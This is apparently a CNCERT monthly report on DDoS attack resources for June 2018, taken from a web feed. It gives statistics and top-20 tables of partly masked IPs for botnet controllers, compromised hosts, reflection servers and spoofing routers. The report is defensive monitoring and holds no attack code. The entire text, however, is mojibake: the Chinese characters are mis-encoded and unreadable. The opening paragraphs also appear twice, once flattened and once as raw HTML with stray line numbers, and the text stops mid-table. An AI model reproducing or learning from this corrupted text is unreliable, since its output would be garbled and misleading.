攻击资æºå®šä¹‰ 本报告为2018å¹´6月份的DDoSæ”»å‡»èµ„æºæœˆåº¦åˆ†æžåŠåŠå¹´æ²»ç†æƒ…å†µåˆ†æžæŠ¥å‘Šã€‚å›´ç»•äº’è”网环境å¨èƒæ²»ç†é—®é¢˜ï¼ŒåŸºäºŽCNCERT监测的DDoS攻击事件数æ®è¿›è¡ŒæŠ½æ ·åˆ†æžï¼Œé‡ç‚¹å¯¹â€œDDoS攻击是从哪些网络资æºä¸Šå‘èµ·çš„â€è¿™ä¸ªé—®é¢˜è¿›è¡Œåˆ†æžã€‚ 主è¦åˆ†æžçš„æ”»å‡»èµ„æºåŒ…括: 1ã€æŽ§åˆ¶ç«¯èµ„æºï¼ŒæŒ‡ç”¨æ¥æŽ§åˆ¶å¤§é‡çš„åƒµå°¸ä¸»æœºèŠ‚ç‚¹å‘æ”»å‡»ç›®æ ‡å‘èµ·DDoS攻击的木马或僵尸网络控制端。 2ã€è‚‰é¸¡èµ„æºï¼ŒæŒ‡è¢«æŽ§åˆ¶ç«¯åˆ©ç”¨ï¼Œå‘æ”»å‡»ç›®æ ‡å‘èµ·DDoS攻击的僵尸主机节点。 3ã€åå°„æœåŠ¡å™¨èµ„æºï¼ŒæŒ‡èƒ½å¤Ÿè¢«é»‘客利用å‘èµ·å射攻击的æœåС噍ã€ä¸»æœºç‰è®¾æ–½ï¼Œå®ƒä»¬æä¾›çš„网络æœåŠ¡ä¸ï¼Œå¦‚æžœå˜åœ¨æŸäº›ç½‘络æœåŠ¡ï¼Œä¸éœ€è¦è¿›è¡Œè®¤è¯å¹¶ä¸”具有放大效果,åˆåœ¨äº’è”网上大é‡éƒ¨ç½²ï¼ˆå¦‚DNSæœåŠ¡å™¨ï¼ŒNTPæœåС噍ç‰ï¼‰ï¼Œå®ƒä»¬å°±å¯èƒ½æˆä¸ºè¢«åˆ©ç”¨å‘èµ·DDoS攻击的网络资æºã€‚ 4ã€è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ï¼Œæ˜¯æŒ‡è½¬å‘了大é‡ä»»æ„ä¼ªé€ IP攻击æµé‡çš„è·¯ç”±å™¨ã€‚ç”±äºŽæˆ‘å›½è¦æ±‚è¿è¥å•†åœ¨æŽ¥å…¥ç½‘上进行æºåœ°å€éªŒè¯ï¼Œå› æ¤è·¨åŸŸä¼ªé€ æµé‡çš„å˜åœ¨ï¼Œè¯´æ˜Žè¯¥è·¯ç”±å™¨æˆ–其下路由器的æºåœ°å€éªŒè¯é…ç½®å¯èƒ½å˜åœ¨ç¼ºé™·ï¼Œä¸”该路由器下的网络ä¸å˜åœ¨å‘动DDoS攻击的设备。 5ã€æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ï¼Œæ˜¯æŒ‡è½¬å‘了大é‡ä¼ªé€ 本区域IP攻击æµé‡çš„路由器。说明该路由器下的网络ä¸å˜åœ¨å‘动DDoS攻击的设备。 在本报告ä¸ï¼Œä¸€æ¬¡DDoS攻击事件是指在ç»éªŒæ”»å‡»å‘¨æœŸå†…,ä¸åŒçš„æ”»å‡»èµ„æºé’ˆå¯¹å›ºå®šç›®æ ‡çš„å•个DDoS攻击,攻击周期时长ä¸è¶…过24å°æ—¶ã€‚如果相åŒçš„æ”»å‡»ç›®æ ‡è¢«ç›¸åŒçš„æ”»å‡»èµ„æºæ‰€æ”»å‡»ï¼Œä½†é—´éš”为24å°æ—¶æˆ–更多,则该事件被认为是两次攻击。æ¤å¤–,DDoS攻击资æºåŠæ”»å‡»ç›®æ ‡åœ°å€å‡æŒ‡å…¶IP地å€ï¼Œå®ƒä»¬çš„地ç†ä½ç½®ç”±å®ƒçš„IP地å€å®šä½å¾—到。 DDoSæ”»å‡»èµ„æºæœˆåº¦åˆ†æž 1. æŽ§åˆ¶ç«¯èµ„æºåˆ†æž æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,利用肉鸡å‘èµ·DDoS攻击的控制端有277个,其ä¸ï¼Œ28个控制端ä½äºŽæˆ‘国境内,249个控制端ä½äºŽå¢ƒå¤–。 ä½äºŽå¢ƒå¤–的控制端按国家或地区分布,美国å 的比例最大,å 42.6%,其次是法国和ä¸å›½é¦™æ¸¯ï¼Œå¦‚图1所示。 图1 本月å‘èµ·DDoSæ”»å‡»çš„å¢ƒå¤–æŽ§åˆ¶ç«¯æ•°é‡æŒ‰å›½å®¶æˆ–地区 ä½äºŽå¢ƒå†…的控制端按çœä»½ç»Ÿè®¡ï¼ŒåŒ—京市å 的比例最大,å 28.6%,其次是浙江çœã€æ²³å—çœå’Œè´µå·žçœï¼›æŒ‰è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 53.6%,è”通å 14.3%,如图2所示。 图2 本月å‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ å‘起攻击最多的境内控制端å‰äºŒåååŠå½’属如表1所示,主è¦ä½äºŽæ±Ÿè‹çœå’Œæµ™æ±Ÿçœã€‚ 表1 本月å‘起攻击最多的境内控制端TOP20 æŽ§åˆ¶ç«¯åœ°å€ å½’å±žçœä»½ 归属è¿è¥å•†æˆ–云æœåС商 123.X.X.143 è´µå·žçœ ç”µä¿¡ 222.X.X.88 江è‹çœ 电信 123.X.X.28 è´µå·žçœ ç”µä¿¡ 118.X.X.50 å¹¿ä¸œçœ ç”µä¿¡ 115.X.X.105 æµ™æ±Ÿçœ ç”µä¿¡ 42.X.X.152 æ²³å—çœ è”通 14.X.X.241 å¹¿ä¸œçœ ç”µä¿¡ 114.X.X.150 北京市 电信 139.X.X.51 上海市 阿里云 61.X.X.112 江è‹çœ 电信 119.X.X.73 å±±ä¸œçœ è”通 42.X.X.198 æ²³å—çœ è”通 123.X.X.85 è´µå·žçœ ç”µä¿¡ 42.X.X.193 æ²³å—çœ è”通 118.X.X.246 è¾½å®çœ 腾讯云 122.X.X.165 æµ™æ±Ÿçœ ç”µä¿¡ 115.X.X.74 æµ™æ±Ÿçœ ç”µä¿¡ 115.X.X.191 æµ™æ±Ÿçœ ç”µä¿¡ 182.X.X.227 上海市 腾讯云 114.X.X.239 北京市 电信 2018å¹´1月至今监测到的控制端ä¸ï¼Œ4.7%的控制端在本月ä»å¤„于活跃状æ€ï¼Œå…±è®¡69个,其ä¸ä½äºŽæˆ‘国境内的控制端数é‡ä¸º33个,ä½äºŽå¢ƒå¤–的控制端数é‡ä¸º36个。æŒç»æ´»è·ƒçš„境内控制端åŠå½’属如表2所示。 表2 2018å¹´ä»¥æ¥æŒç»æ´»è·ƒå‘èµ·DDOS攻击的境内控制端 æŽ§åˆ¶ç«¯åœ°å€ å½’å±žçœä»½ 归属è¿è¥å•† 14.X.X.173 云å—çœ è”通 […]]]></description>
2033 <content:encoded><![CDATA[<h2>本月é‡ç‚¹å…³æ³¨æƒ…况</h2>
2034<blockquote><p style="text-align: justify;">1ã€æœ¬æœˆåˆ©ç”¨è‚‰é¸¡å‘èµ·DDoS攻击的控制端ä¸ï¼Œå¢ƒå¤–控制端近一åŠä½äºŽç¾Žå›½ï¼›å¢ƒå†…控制端最多ä½äºŽåŒ—京市,其次是浙江çœã€æ²³å—çœå’Œè´µå·žçœï¼ŒæŒ‰å½’属è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大。</p>
2035<p style="text-align: justify;">2ã€æœ¬æœˆå‚与攻击较多的肉鸡地å€ä¸»è¦ä½äºŽåŒ—京市ã€è´µå·žçœã€å››å·çœå’Œäº‘å—çœï¼Œå…¶ä¸å¤§é‡è‚‰é¸¡åœ°å€å½’属于电信è¿è¥å•†ã€‚2018年以æ¥ç›‘测到的æŒç»æ´»è·ƒçš„肉鸡资æºä¸ï¼Œä½äºŽå±±ä¸œçœã€ä¸Šæµ·å¸‚ã€å¹¿ä¸œçœå 的比例最大。</p>
2036<p style="text-align: justify;">3ã€æœ¬æœˆè¢«åˆ©ç”¨å‘èµ·Memcachedå射攻击境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡æŽ’åå‰ä¸‰åçš„çœä»½æ˜¯å±±ä¸œçœã€å¹¿ä¸œçœå’ŒåŒ—äº¬å¸‚ï¼Œæ•°é‡æœ€å¤šçš„归属è¿è¥å•†æ˜¯ç”µä¿¡ã€‚被利用å‘èµ·NTPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡æŽ’åå‰ä¸‰åçš„çœä»½æ˜¯å¹¿ä¸œçœã€å±±ä¸œçœå’Œç”˜è‚ƒçœï¼›æ•°é‡æœ€å¤šçš„归属è¿è¥å•†æ˜¯ç§»åŠ¨ã€‚è¢«åˆ©ç”¨å‘èµ·SSDPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡æŽ’åå‰ä¸‰åçš„çœä»½æ˜¯è¾½å®çœã€æ±Ÿè‹çœå’Œæ²³å—çœï¼›æ•°é‡æœ€å¤šçš„归属è¿è¥å•†æ˜¯è”通。</p>
2037<p style="text-align: justify;">4ã€æœ¬æœˆè½¬å‘ä¼ªé€ è·¨åŸŸæ”»å‡»æµé‡çš„路由器ä¸ï¼Œå½’属于新疆维å¾å°”自治区移动的æŸè·¯ç”±å™¨å‚ä¸Žçš„æ”»å‡»äº‹ä»¶æ•°é‡æœ€å¤šï¼›åŒ—äº¬å¸‚ã€æ±Ÿè‹çœå’Œå±±ä¸œçœçš„è·¨åŸŸä¼ªé€ æ¥æºè·¯ç”±å™¨æ•°é‡æœ€å¤šã€‚</p>
2038<p style="text-align: justify;">5ã€æœ¬æœˆè½¬å‘ä¼ªé€ æœ¬åœ°æ”»å‡»æµé‡çš„路由器ä¸ï¼Œå½’属于山西çœç”µä¿¡çš„æŸè·¯ç”±å™¨å‚ä¸Žçš„æ”»å‡»äº‹ä»¶æ•°é‡æœ€å¤šï¼›æ±Ÿè‹çœã€å±±è¥¿çœã€é™•西çœå’Œå¹¿ä¸œçœçš„æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æœ€å¤šã€‚</p>
2039<p style="text-align: justify;">6ã€ç»è¿‡åŠå¹´æ¥é’ˆå¯¹æˆ‘国境内的攻击资æºçš„专项治ç†å·¥ä½œï¼Œå¢ƒå†…控制端ã€è‚‰é¸¡ç‰èµ„æºçš„æœˆæ´»è·ƒæ•°é‡è¾ƒ2017年有了较明显的下é™è¶‹åŠ¿ï¼›å¢ƒå†…æŽ§åˆ¶ç«¯ã€è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ã€æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ç‰èµ„æºè¿‘ä¸‰ä¸ªæœˆæ¯æœˆçš„æ–°å¢žçŽ‡ã€æ¶ˆäº¡çŽ‡ç›¸æ¯”2017å¹´æœˆåº¦å¹³å‡æ•°å€¼æœ‰ä¸€å®šç¨‹åº¦çš„上å‡ï¼Œæ„味ç€èµ„æºå˜åŒ–é€Ÿåº¦åŠ å¿«ï¼Œå¯è¢«åˆ©ç”¨çš„资æºç¨³å®šæ€§é™ä½Žï¼›å¢ƒå†…åå°„æœåŠ¡å™¨èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ã€æ¶ˆäº¡çŽ‡ç›¸æ¯”2017å¹´æœˆåº¦å¹³å‡æ•°å€¼ï¼Œæ–°å¢žçއå˜åŒ–䏿˜Žæ˜¾ã€æ¶ˆäº¡çŽ‡å‘ˆçŽ°ä¸€å®šç¨‹åº¦çš„ä¸‹é™ï¼Œæ„味ç€å¯åˆ©ç”¨çš„èµ„æºæ•°é‡é€æ¥å‡å°‘。</p>
2040</blockquote>
2041<h2>攻击资æºå®šä¹‰</h2>
2042<p style="text-align: justify;"><b style="color: rgb(0, 176, 80);">本报告为2018å¹´6月份的DDoSæ”»å‡»èµ„æºæœˆåº¦åˆ†æžåŠåŠå¹´æ²»ç†æƒ…å†µåˆ†æžæŠ¥å‘Šã€‚å›´ç»•äº’è”网环境å¨èƒæ²»ç†é—®é¢˜ï¼ŒåŸºäºŽCNCERT监测的DDoS攻击事件数æ®è¿›è¡ŒæŠ½æ ·åˆ†æžï¼Œé‡ç‚¹å¯¹â€œDDoS攻击是从哪些网络资æºä¸Šå‘èµ·çš„â€è¿™ä¸ªé—®é¢˜è¿›è¡Œåˆ†æžã€‚</b></p>
2043<p style="text-align: justify;">主è¦åˆ†æžçš„æ”»å‡»èµ„æºåŒ…括:</p>
2044<blockquote><p style="text-align: justify;">1ã€æŽ§åˆ¶ç«¯èµ„æºï¼ŒæŒ‡ç”¨æ¥æŽ§åˆ¶å¤§é‡çš„åƒµå°¸ä¸»æœºèŠ‚ç‚¹å‘æ”»å‡»ç›®æ ‡å‘èµ·DDoS攻击的木马或僵尸网络控制端。</p>
2045<p style="text-align: justify;">2ã€è‚‰é¸¡èµ„æºï¼ŒæŒ‡è¢«æŽ§åˆ¶ç«¯åˆ©ç”¨ï¼Œå‘æ”»å‡»ç›®æ ‡å‘èµ·DDoS攻击的僵尸主机节点。</p>
2046<p style="text-align: justify;">3ã€åå°„æœåŠ¡å™¨èµ„æºï¼ŒæŒ‡èƒ½å¤Ÿè¢«é»‘客利用å‘èµ·å射攻击的æœåС噍ã€ä¸»æœºç‰è®¾æ–½ï¼Œå®ƒä»¬æä¾›çš„网络æœåŠ¡ä¸ï¼Œå¦‚æžœå˜åœ¨æŸäº›ç½‘络æœåŠ¡ï¼Œä¸éœ€è¦è¿›è¡Œè®¤è¯å¹¶ä¸”具有放大效果,åˆåœ¨äº’è”网上大é‡éƒ¨ç½²ï¼ˆå¦‚DNSæœåŠ¡å™¨ï¼ŒNTPæœåС噍ç‰ï¼‰ï¼Œå®ƒä»¬å°±å¯èƒ½æˆä¸ºè¢«åˆ©ç”¨å‘èµ·DDoS攻击的网络资æºã€‚</p>
2047<p style="text-align: justify;">4ã€è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ï¼Œæ˜¯æŒ‡è½¬å‘了大é‡ä»»æ„ä¼ªé€ IP攻击æµé‡çš„è·¯ç”±å™¨ã€‚ç”±äºŽæˆ‘å›½è¦æ±‚è¿è¥å•†åœ¨æŽ¥å…¥ç½‘上进行æºåœ°å€éªŒè¯ï¼Œå› æ¤è·¨åŸŸä¼ªé€ æµé‡çš„å˜åœ¨ï¼Œè¯´æ˜Žè¯¥è·¯ç”±å™¨æˆ–其下路由器的æºåœ°å€éªŒè¯é…ç½®å¯èƒ½å˜åœ¨ç¼ºé™·ï¼Œä¸”该路由器下的网络ä¸å˜åœ¨å‘动DDoS攻击的设备。</p>
2048<p style="text-align: justify;">5ã€æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ï¼Œæ˜¯æŒ‡è½¬å‘了大é‡ä¼ªé€ 本区域IP攻击æµé‡çš„路由器。说明该路由器下的网络ä¸å˜åœ¨å‘动DDoS攻击的设备。</p>
2049</blockquote>
2050<p style="text-align: justify;">在本报告ä¸ï¼Œä¸€æ¬¡DDoS攻击事件是指在ç»éªŒæ”»å‡»å‘¨æœŸå†…,ä¸åŒçš„æ”»å‡»èµ„æºé’ˆå¯¹å›ºå®šç›®æ ‡çš„å•个DDoS攻击,攻击周期时长ä¸è¶…过24å°æ—¶ã€‚如果相åŒçš„æ”»å‡»ç›®æ ‡è¢«ç›¸åŒçš„æ”»å‡»èµ„æºæ‰€æ”»å‡»ï¼Œä½†é—´éš”为24å°æ—¶æˆ–更多,则该事件被认为是两次攻击。æ¤å¤–,DDoS攻击资æºåŠæ”»å‡»ç›®æ ‡åœ°å€å‡æŒ‡å…¶IP地å€ï¼Œå®ƒä»¬çš„地ç†ä½ç½®ç”±å®ƒçš„IP地å€å®šä½å¾—到。</p>
2051<h2>DDoSæ”»å‡»èµ„æºæœˆåº¦åˆ†æž</h2>
2052<h3>1. <b style="">控制端资æºåˆ†æž</b></h3>
2053<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,利用肉鸡å‘èµ·DDoS攻击的控制端有277个,其ä¸ï¼Œ28个控制端ä½äºŽæˆ‘国境内,249个控制端ä½äºŽå¢ƒå¤–。</p>
2054<p style="text-align: justify;">ä½äºŽå¢ƒå¤–的控制端按国家或地区分布,美国å 的比例最大,å 42.6%,其次是法国和ä¸å›½é¦™æ¸¯ï¼Œå¦‚图1所示。</p>
2055<p><img alt="本月å‘èµ·DDoSæ”»å‡»çš„å¢ƒå¤–æŽ§åˆ¶ç«¯æ•°é‡æŒ‰å›½å®¶æˆ–地区" src="http://image.3001.net/images/20180724/15324137913763.png!small" width="690" height="191.11510791366908"></p>
2056<p style="text-align: center;">图1 本月å‘èµ·DDoSæ”»å‡»çš„å¢ƒå¤–æŽ§åˆ¶ç«¯æ•°é‡æŒ‰å›½å®¶æˆ–地区</p>
2057<p style="text-align: justify;">ä½äºŽå¢ƒå†…的控制端按çœä»½ç»Ÿè®¡ï¼ŒåŒ—京市å 的比例最大,å 28.6%,其次是浙江çœã€æ²³å—çœå’Œè´µå·žçœï¼›æŒ‰è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 53.6%,è”通å 14.3%,如图2所示。</p>
2058<p><img alt="本月å‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒæœ¬æœˆå‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/1532413804502.png!small" width="690" height="269.49056603773585"></p>
2059<p style="text-align: center;">图2 本月å‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
2060<p style="text-align: justify;">å‘起攻击最多的境内控制端å‰äºŒåååŠå½’属如表1所示,主è¦ä½äºŽæ±Ÿè‹çœå’Œæµ™æ±Ÿçœã€‚</p>
2061<p style="text-align: center;">表1 本月å‘起攻击最多的境内控制端TOP20</p>
2062<table>
2063<colgroup>
2064<col>
2065<col>
2066<col> </colgroup>
2067<thead>
2068<tr>
2069<th><strong>控制端地å€</strong></th>
2070<th><strong>归属çœä»½</strong></th>
2071<th><strong>归属è¿è¥å•†æˆ–云æœåС商</strong></th>
2072</tr>
2073</thead>
2074<tbody>
2075<tr>
2076<td>123.X.X.143</td>
2077<td>贵州çœ</td>
2078<td>电信</td>
2079</tr>
2080<tr>
2081<td>222.X.X.88</td>
2082<td>江è‹çœ</td>
2083<td>电信</td>
2084</tr>
2085<tr>
2086<td>123.X.X.28</td>
2087<td>贵州çœ</td>
2088<td>电信</td>
2089</tr>
2090<tr>
2091<td>118.X.X.50</td>
2092<td>广东çœ</td>
2093<td>电信</td>
2094</tr>
2095<tr>
2096<td>115.X.X.105</td>
2097<td>浙江çœ</td>
2098<td>电信</td>
2099</tr>
2100<tr>
2101<td>42.X.X.152</td>
2102<td>æ²³å—çœ</td>
2103<td>è”通</td>
2104</tr>
2105<tr>
2106<td>14.X.X.241</td>
2107<td>广东çœ</td>
2108<td>电信</td>
2109</tr>
2110<tr>
2111<td>114.X.X.150</td>
2112<td>北京市</td>
2113<td>电信</td>
2114</tr>
2115<tr>
2116<td>139.X.X.51</td>
2117<td>上海市</td>
2118<td>阿里云</td>
2119</tr>
2120<tr>
2121<td>61.X.X.112</td>
2122<td>江è‹çœ</td>
2123<td>电信</td>
2124</tr>
2125<tr>
2126<td>119.X.X.73</td>
2127<td>山东çœ</td>
2128<td>è”通</td>
2129</tr>
2130<tr>
2131<td>42.X.X.198</td>
2132<td>æ²³å—çœ</td>
2133<td>è”通</td>
2134</tr>
2135<tr>
2136<td>123.X.X.85</td>
2137<td>贵州çœ</td>
2138<td>电信</td>
2139</tr>
2140<tr>
2141<td>42.X.X.193</td>
2142<td>æ²³å—çœ</td>
2143<td>è”通</td>
2144</tr>
2145<tr>
2146<td>118.X.X.246</td>
2147<td>è¾½å®çœ</td>
2148<td>腾讯云</td>
2149</tr>
2150<tr>
2151<td>122.X.X.165</td>
2152<td>浙江çœ</td>
2153<td>电信</td>
2154</tr>
2155<tr>
2156<td>115.X.X.74</td>
2157<td>浙江çœ</td>
2158<td>电信</td>
2159</tr>
2160<tr>
2161<td>115.X.X.191</td>
2162<td>浙江çœ</td>
2163<td>电信</td>
2164</tr>
2165<tr>
2166<td>182.X.X.227</td>
2167<td>上海市</td>
2168<td>腾讯云</td>
2169</tr>
2170<tr>
2171<td>114.X.X.239</td>
2172<td>北京市</td>
2173<td>电信</td>
2174</tr>
2175</tbody>
2176</table>
2177<h2 style="text-align: justify;"></h2>
2178<p>2018å¹´1月至今监测到的控制端ä¸ï¼Œ4.7%的控制端在本月ä»å¤„于活跃状æ€ï¼Œå…±è®¡69个,其ä¸ä½äºŽæˆ‘国境内的控制端数é‡ä¸º33个,ä½äºŽå¢ƒå¤–的控制端数é‡ä¸º36个。æŒç»æ´»è·ƒçš„境内控制端åŠå½’属如表2所示。</p>
2179<p style="text-align: center;">表2 2018å¹´ä»¥æ¥æŒç»æ´»è·ƒå‘èµ·DDOS攻击的境内控制端</p>
2180<table>
2181<colgroup>
2182<col>
2183<col>
2184<col> </colgroup>
2185<thead>
2186<tr>
2187<th><strong>控制端地å€</strong></th>
2188<th><strong>归属çœä»½</strong></th>
2189<th><strong>归属è¿è¥å•†</strong></th>
2190</tr>
2191</thead>
2192<tbody>
2193<tr>
2194<td>14.X.X.173</td>
2195<td>云å—çœ</td>
2196<td>è”通</td>
2197</tr>
2198<tr>
2199<td>211.X.X.156</td>
2200<td>湖北çœ</td>
2201<td>è”通</td>
2202</tr>
2203<tr>
2204<td>218.X.X.30</td>
2205<td>黑龙江çœ</td>
2206<td>è”通</td>
2207</tr>
2208<tr>
2209<td>121.X.X.62</td>
2210<td>浙江çœ</td>
2211<td>电信</td>
2212</tr>
2213<tr>
2214<td>42.X.X.104</td>
2215<td>è¾½å®çœ</td>
2216<td>è”通</td>
2217</tr>
2218<tr>
2219<td>113.X.X.35</td>
2220<td>广东çœ</td>
2221<td>电信</td>
2222</tr>
2223<tr>
2224<td>115.X.X.39</td>
2225<td>浙江çœ</td>
2226<td>电信</td>
2227</tr>
2228<tr>
2229<td>220.X.X.164</td>
2230<td>天津市</td>
2231<td>è”通</td>
2232</tr>
2233<tr>
2234<td>123.X.X.169</td>
2235<td>山东çœ</td>
2236<td>è”通</td>
2237</tr>
2238<tr>
2239<td>61.X.X.60</td>
2240<td>æ²³å—çœ</td>
2241<td>è”通</td>
2242</tr>
2243<tr>
2244<td>117.X.X.110</td>
2245<td>陕西çœ</td>
2246<td>电信</td>
2247</tr>
2248<tr>
2249<td>183.X.X.75</td>
2250<td>浙江çœ</td>
2251<td>电信</td>
2252</tr>
2253<tr>
2254<td>183.X.X.19</td>
2255<td>浙江çœ</td>
2256<td>电信</td>
2257</tr>
2258<tr>
2259<td>139.X.X.174</td>
2260<td>剿ž—çœ</td>
2261<td>è”通</td>
2262</tr>
2263<tr>
2264<td>115.X.X.206</td>
2265<td>浙江çœ</td>
2266<td>电信</td>
2267</tr>
2268<tr>
2269<td>117.X.X.199</td>
2270<td>陕西çœ</td>
2271<td>电信</td>
2272</tr>
2273<tr>
2274<td>222.X.X.48</td>
2275<td>江è‹çœ</td>
2276<td>电信</td>
2277</tr>
2278<tr>
2279<td>111.X.X.158</td>
2280<td>北京市</td>
2281<td>è”通</td>
2282</tr>
2283<tr>
2284<td>27.X.X.34</td>
2285<td>山东çœ</td>
2286<td>è”通</td>
2287</tr>
2288<tr>
2289<td>111.X.X.159</td>
2290<td>北京市</td>
2291<td>è”通</td>
2292</tr>
2293<tr>
2294<td>123.X.X.153</td>
2295<td>山东çœ</td>
2296<td>è”通</td>
2297</tr>
2298<tr>
2299<td>117.X.X.112</td>
2300<td>江西çœ</td>
2301<td>电信</td>
2302</tr>
2303<tr>
2304<td>101.X.X.195</td>
2305<td>北京市</td>
2306<td>电信</td>
2307</tr>
2308<tr>
2309<td>61.X.X.89</td>
2310<td>æ²³å—çœ</td>
2311<td>è”通</td>
2312</tr>
2313<tr>
2314<td>111.X.X.196</td>
2315<td>江西çœ</td>
2316<td>电信</td>
2317</tr>
2318<tr>
2319<td>117.X.X.207</td>
2320<td>陕西çœ</td>
2321<td>电信</td>
2322</tr>
2323<tr>
2324<td>117.X.X.107</td>
2325<td>江西çœ</td>
2326<td>电信</td>
2327</tr>
2328<tr>
2329<td>113.X.X.149</td>
2330<td>é‡åº†å¸‚</td>
2331<td>è”通</td>
2332</tr>
2333<tr>
2334<td>175.X.X.203</td>
2335<td>æ¹–å—çœ</td>
2336<td>电信</td>
2337</tr>
2338<tr>
2339<td>121.X.X.108</td>
2340<td>河北çœ</td>
2341<td>è”通</td>
2342</tr>
2343<tr>
2344<td>61.X.X.201</td>
2345<td>江è‹çœ</td>
2346<td>电信</td>
2347</tr>
2348<tr>
2349<td>183.X.X.41</td>
2350<td>浙江çœ</td>
2351<td>电信</td>
2352</tr>
2353<tr>
2354<td>183.X.X.35</td>
2355<td>浙江çœ</td>
2356<td>电信</td>
2357</tr>
2358</tbody>
2359</table>
2360<p>2018å¹´1月至今æŒç»æ´»è·ƒçš„境内控制端按çœä»½ç»Ÿè®¡ï¼Œæµ™æ±Ÿçœæ‰€å 比例最大,为21.2%;按è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,为54.5%,è”通å 45.5%,如图3所示。</p>
2361<h3><img alt="2018å¹´ä»¥æ¥æŒç»æ´»è·ƒå‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324138201538.png!small" width="690" height="259.6465696465697"></h3>
2362<p style="text-align: center;">图3 2018å¹´ä»¥æ¥æŒç»æ´»è·ƒå‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
2363<h3>2. 肉鸡资æºåˆ†æž</h3>
2364<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,共有117,690个肉鸡地å€å‚ä¸ŽçœŸå®žåœ°å€æ”»å‡»ï¼ˆåŒ…å«çœŸå®žåœ°å€æ”»å‡»ä¸Žå…¶å®ƒæ”»å‡»çš„æ··åˆæ”»å‡»ï¼‰ã€‚</p>
2365<p style="text-align: justify;">è¿™äº›è‚‰é¸¡èµ„æºæŒ‰çœä»½ç»Ÿè®¡ï¼ŒåŒ—京市å 的比例最大,为7.9%,其次是贵州çœã€å››å·çœå’Œäº‘å—çœï¼›æŒ‰è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,为54.0%,è”通å 25.7%,移动å 17.5%,如图4所示。</p>
2366<p style="text-align: justify;"><img alt="æœ¬æœˆè‚‰é¸¡åœ°å€æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324138647157.png!small" width="690" height="311.1509433962264"></p>
2367<p style="text-align: center;">图4 æœ¬æœˆè‚‰é¸¡åœ°å€æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
2368<p style="text-align: center;">
2369<p style="text-align: justify;">本月å‚与攻击最多的肉鸡地å€å‰äºŒåååŠå½’属如表3所示,ä½äºŽå±±è¥¿çœçš„åœ°å€æœ€å¤šã€‚</p>
2370<p style="text-align: center;">表3 本月å‚与攻击最多的肉鸡地å€TOP20</p>
2371<table>
2372<colgroup>
2373<col>
2374<col>
2375<col> </colgroup>
2376<thead>
2377<tr>
2378<th>肉鸡地å€</th>
2379<th>归属çœä»½</th>
2380<th>归属è¿è¥å•†</th>
2381</tr>
2382</thead>
2383<tbody>
2384<tr>
2385<td>58.X.X.148</td>
2386<td>山东çœ</td>
2387<td>电信</td>
2388</tr>
2389<tr>
2390<td>124.X.X.2</td>
2391<td>山西çœ</td>
2392<td>è”通</td>
2393</tr>
2394<tr>
2395<td>123.X.X.32</td>
2396<td>内蒙å¤è‡ªæ²»åŒº</td>
2397<td>电信</td>
2398</tr>
2399<tr>
2400<td>122.X.X.199</td>
2401<td>æ²³å—çœ</td>
2402<td>è”通</td>
2403</tr>
2404<tr>
2405<td>183.X.X.66</td>
2406<td>山西çœ</td>
2407<td>移动</td>
2408</tr>
2409<tr>
2410<td>111.X.X.2</td>
2411<td>山西çœ</td>
2412<td>移动</td>
2413</tr>
2414<tr>
2415<td>58.X.X.12</td>
2416<td>山东çœ</td>
2417<td>电信</td>
2418</tr>
2419<tr>
2420<td>60.X.X.211</td>
2421<td>山西çœ</td>
2422<td>è”通</td>
2423</tr>
2424<tr>
2425<td>106.X.X.223</td>
2426<td>新疆维å¾å°”æ—自治区</td>
2427<td>电信</td>
2428</tr>
2429<tr>
2430<td>124.X.X.2</td>
2431<td>æ²³å—çœ</td>
2432<td>è”通</td>
2433</tr>
2434<tr>
2435<td>118.X.X.101</td>
2436<td>å››å·çœ</td>
2437<td>电信</td>
2438</tr>
